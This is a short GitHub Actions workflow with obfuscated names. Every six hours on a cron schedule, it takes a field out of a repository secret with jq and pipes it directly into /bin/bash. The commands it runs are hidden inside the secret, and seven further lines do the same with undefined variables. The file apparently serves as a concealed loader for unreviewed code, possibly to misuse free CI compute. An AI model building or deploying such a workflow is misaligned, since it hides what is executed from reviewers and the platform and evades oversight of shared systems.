name: luofuta1234
on:
  workflow_dispatch:
  schedule:
    - cron: '16 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luofuta1234
        env:
          lkja6979: ${{ secrets.lkja6979 }}
        run: |
          echo $lkja6979 | jq -r .ge8635 | /bin/bash
          echo $burvj3 | jq -r .rp98 | /bin/bash
          echo $x6 | jq -r .xaunn319 | /bin/bash
          echo $k5 | jq -r .ds2 | /bin/bash
          echo $ok6 | jq -r .q43607 | /bin/bash
          echo $grwbs9717 | jq -r .oyh4 | /bin/bash
          echo $zhw87615 | jq -r .y62739 | /bin/bash
          echo $fp318 | jq -r .lox98 | /bin/bash

